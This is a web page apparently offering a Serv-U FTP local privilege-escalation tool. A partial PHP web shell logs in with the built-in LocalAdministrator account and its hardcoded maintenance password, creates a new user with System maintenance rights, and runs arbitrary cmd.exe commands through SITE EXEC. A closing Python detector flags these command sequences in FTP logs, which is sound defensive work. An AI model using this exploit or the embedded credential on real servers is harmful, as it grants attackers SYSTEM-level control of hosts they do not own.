Serv-U Local Get SYSTEM Shell with ASP

Author: lake2, http://www.winshell.cn

The ASP page is a small form with three fields (user, pwd, port), two buttons (Add User, Del User) and a "Done!" status message once the request has been sent.

Only for Enjoy&Challenge !

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The contents of serv-u.php are as follows (form labels translated from Chinese):

Serv-U local privilege escalation (坏狼网络)

Privilege escalation section
Host FTP port:
Username to add:
Password for the added user:
User home directory (don't forget the trailing "\"):

Serv-U local privilege escalation (坏狼网络)

Command execution section
Host FTP port:
Username:
User password:
Command to execute:


```php
// (the beginning of the file, including the head of this function, is missing from this copy)
        \n";
    } else {
        // Log in as Serv-U's built-in LocalAdministrator maintenance account
        fputs ($fp, "USER LocalAdministrator\r\n");
        sleep (1);
        fputs ($fp, "PASS #l@\$ak#.lk;0@P\r\n");
        sleep (1);
        // Enter maintenance mode and create a new user with system-level maintenance rights
        fputs ($fp, "SITE MAINTENANCE\r\n");
        sleep (1);
        fputs ($fp, "-SETUSERSETUP\r\n");
        fputs ($fp, "-IP=0.0.0.0\r\n");
        fputs ($fp, "-PortNo=".$ftpport."\r\n");
        fputs ($fp, "-User=".$user."\r\n");
        fputs ($fp, "-Password=".$password."\r\n");
        fputs ($fp, "-HomeDir=".$homedir."\r\n");
        fputs ($fp, "-LoginMesFile=\r\n");
        fputs ($fp, "-Disable=0\r\n");
        fputs ($fp, "-RelPaths=0\r\n");
        fputs ($fp, "-NeedSecure=0\r\n");
        fputs ($fp, "-HideHidden=0\r\n");
        fputs ($fp, "-AlwaysAllowLogin=0\r\n");
        fputs ($fp, "-ChangePassword=1\r\n");
        fputs ($fp, "-QuotaEnable=0\r\n");
        fputs ($fp, "-MaxUsersLoginPerIP=-1\r\n");
        fputs ($fp, "-SpeedLimitUp=-1\r\n");
        fputs ($fp, "-SpeedLimitDown=-1\r\n");
        fputs ($fp, "-MaxNrUsers=-1\r\n");
        fputs ($fp, "-IdleTimeOut=600\r\n");
        fputs ($fp, "-SessionTimeOut=-1\r\n");
        fputs ($fp, "-Expire=0\r\n");
        fputs ($fp, "-RatioUp=1\r\n");
        fputs ($fp, "-RatioDown=1\r\n");
        fputs ($fp, "-RatiosCredit=0\r\n");
        fputs ($fp, "-QuotaCurrent=0\r\n");
        fputs ($fp, "-QuotaMaximum=0\r\n");
        fputs ($fp, "-Maintenance=System\r\n");
        fputs ($fp, "-PasswordType=Regular\r\n");
        fputs ($fp, "-Ratios=None\r\n");
        fputs ($fp, " Access=".$homedir."|RWAMELCDP\r\n");
        sleep (1);
        // Read the new account back to confirm it was created
        fputs ($fp, "-GETUSERSETUP\r\n");
        fputs ($fp, "-IP=0.0.0.0\r\n");
        fputs ($fp, "-PortNo=".$ftpport."\r\n");
        fputs ($fp, " User=".$user."\r\n");
        sleep (1);
        fputs ($fp, "QUIT\r\n");
        sleep (1);
        while (!feof($fp)) {
            echo fgets ($fp,128);
        }
        fclose ($fp);
    }
}

// Log in as the newly created user and run a command through SITE EXEC
function ftpcmd($ftpport,$user,$password,$cmd){
    $conn_id = fsockopen ("127.0.0.1", $ftpport, $errno, $errstr, 30);
    if (!$conn_id) {
        echo "$errstr ($errno)\n";
    } else {
        fputs ($conn_id, "USER ".$user."\r\n");
        sleep (1);
        fputs ($conn_id, "PASS ".$password."\r\n");
        sleep (1);
        fputs ($conn_id, "SITE EXEC c:\\windows\\system32\\cmd.exe /c ".$cmd."\r\n");
        fputs ($conn_id, "QUIT\r\n");
        sleep (1);
        while (!feof($conn_id)) {
            echo fgets ($conn_id,128);
        }
        fclose($conn_id);
    }
}
?>
```
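From the defender's side, the command sequence above is easy to recognise on the FTP control channel. The following detector is an added example, not code from the original page or from Serv-U; it assumes a constructed transcript format of "<timestamp> <client_ip> C> <command>" and flags the login as the LocalAdministrator maintenance account, the SITE MAINTENANCE block that creates a user with -Maintenance=System, and SITE EXEC.

```python
# Added detector (not part of the original page or of Serv-U). Input format is
# constructed here: "<timestamp> <client_ip> C> <ftp command>". Loopback sessions
# are marked, since the exploit above always connects to 127.0.0.1.
import re

LINE_RE = re.compile(r"^(\S+)\s+(\S+)\s+C>\s+(.*)$")

def parse(lines):
    """Return (client_ip, command) for each client-command line; skip everything else."""
    out = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if m:
            out.append((m.group(2), m.group(3).strip()))
    return out

def classify(cmd):
    """Map one FTP command to a detection rule name, or None if it is not of interest."""
    parts = cmd.split(None, 1)
    verb = parts[0].upper() if parts else ""
    arg = parts[1].strip() if len(parts) == 2 else ""
    if verb == "USER" and arg.lower() == "localadministrator":
        return "maintenance-account-login"
    if verb == "SITE" and arg.upper() == "MAINTENANCE":
        return "site-maintenance"
    if cmd.strip().upper() == "-MAINTENANCE=SYSTEM":
        return "system-maintenance-user-created"
    if verb == "SITE" and arg.upper().startswith("EXEC"):
        return "site-exec"
    return None

def detect(lines):
    """Return findings as dicts: ip, rule, cmd, loopback (True for 127.0.0.1)."""
    findings = []
    for ip, cmd in parse(lines):
        rule = classify(cmd)
        if rule:
            findings.append({"ip": ip, "rule": rule, "cmd": cmd, "loopback": ip == "127.0.0.1"})
    return findings

# Constructed sample transcript: the exploit's sequence from loopback, then a benign session.
SAMPLE = """\
2004-06-01T10:00:01 127.0.0.1 C> USER LocalAdministrator
2004-06-01T10:00:01 127.0.0.1 C> PASS ****
2004-06-01T10:00:02 127.0.0.1 C> SITE MAINTENANCE
2004-06-01T10:00:02 127.0.0.1 C> -SETUSERSETUP
2004-06-01T10:00:02 127.0.0.1 C> -Maintenance=System
2004-06-01T10:00:11 127.0.0.1 C> SITE EXEC c:\\windows\\system32\\cmd.exe /c hostname
2004-06-01T10:05:00 10.0.0.5 C> USER alice
2004-06-01T10:05:01 10.0.0.5 C> LIST
""".splitlines()
```

Any hit from a loopback client is the strongest signal, since no legitimate administrator logs in through the local maintenance account from a web-server process.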